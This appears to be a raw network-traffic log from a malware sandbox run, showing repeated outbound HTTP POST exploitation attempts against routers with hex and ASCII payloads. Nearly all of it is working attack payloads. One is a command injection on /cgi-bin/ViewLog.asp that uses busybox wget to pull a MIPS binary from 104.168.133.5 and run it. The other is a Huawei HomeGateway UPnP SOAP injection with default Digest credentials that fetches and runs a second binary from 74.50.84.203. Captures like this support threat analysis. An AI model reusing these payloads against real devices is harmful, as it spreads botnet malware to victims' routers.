                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:05.926187992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:08.294198990 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.902173996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.862144947 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              676192.168.2.1352680156.235.108.5137215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.763609886 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:08.806185007 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:14.950161934 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              677192.168.2.133399094.46.14.1088080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.782108068 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.980357885 CET1340INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:18:04 GMT
                                              Server: Apache
                                              Accept-Ranges: bytes
                                              Access-Control-Allow-Origin: *
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c
                                              Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: bl


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              678192.168.2.135778085.172.10.418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.819375992 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:05.058154106 CET442INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 07:18:03 GMT
                                              Server: DNVRS-Webs
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              679192.168.2.134306831.136.155.298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.968741894 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:05.542215109 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.694199085 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.062170982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.670175076 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
